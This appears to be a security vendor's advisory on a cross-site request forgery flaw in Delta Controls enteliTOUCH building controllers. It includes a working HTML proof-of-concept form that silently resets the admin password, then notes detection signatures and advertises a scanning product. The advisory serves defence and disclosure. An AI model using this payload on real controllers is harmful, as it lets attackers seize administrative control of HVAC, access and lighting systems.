top of page

Delta Controls enteliTOUCH Cross-Site Request Forgery



Application Details

Delta Controls enteliTOUCh provides building owners a fully integrated touchscreen building controller. Including controllers for HVAC, Access and Lighting, as well as motion and thermostat sensors.


Vulnerability

Delta Controls enteliTOUCH is vulnerable to cross-site request forgery, caused by improper validation of user-supplied input.


Identification

By persuading an authenticated user to visit a malicious Web site, a remote attacker could send a malformed HTTP request to perform unauthorised actions with administrative privileges. An attacker could exploit this vulnerability to perform cross-site scripting attacks, Web cache poisoning and other malicious activities.


<html>
<body>
<form action="http://localhost/deltaweb/hmi_useredit.asp?formAction=Edit&userName=DELTA&userPassword=baaah" method="POST">
  <input type="hidden" name="actionName" value="" />
  <input type="hidden" name="Username" value="DELTA" />
  <input type="hidden" name="Password" value="123456" />
  <input type="hidden" name="AutoLogout" value="30" />
  <input type="hidden" name="SS_SelectedOptionId" value="" />
  <input type="hidden" name="ObjRef" value="ZSL-251" />
  <input type="hidden" name="Apply" value="true" />
  <input type="hidden" name="formAction" value="Edit" />
  <input type="submit" value="Go for UserEdit" />
</form>
</body>


Detection

By turning this into traffic files and matching rules, we are able to detect attempts to change an admin password via CSRF.


Coverage

Idappcom has created signatures 8022692 and 8022693 along with traffic files.


References


Traffic IQ

If you are concerned that your business may be at risk of this vulnerability, or others, why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional

Comments


bottom of page